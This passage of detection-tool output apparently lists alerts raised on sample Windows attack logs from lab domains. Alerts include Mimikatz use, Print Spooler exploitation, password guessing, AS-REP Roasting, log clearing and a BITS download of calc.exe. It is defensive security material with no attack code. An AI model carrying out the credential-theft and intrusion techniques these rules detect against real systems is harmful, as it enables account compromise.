serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_5848 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848 : Workstation: - : IP Address: - : Port: - : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848 : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,- +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target 
User: sshd_4332 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332 : Workstation: - : IP Address: - : Port: - : LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: admmig : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47156 : LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47160 : LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC 
Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65333 : LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65335 : LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65336 : LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.380 
+09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65337 : LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount : SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie : SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 23:09:38.437 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe 
[result] count:1 TaskName:\\Microsoft\\SynchronizeTimeZone timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 56061 : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device 
Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered 
Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 51503 : LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 56594 : LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.383 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\bouWFQYO timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. 
arg.).evtx +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask 
creation (GLOBAL).evtx" +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test : URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 
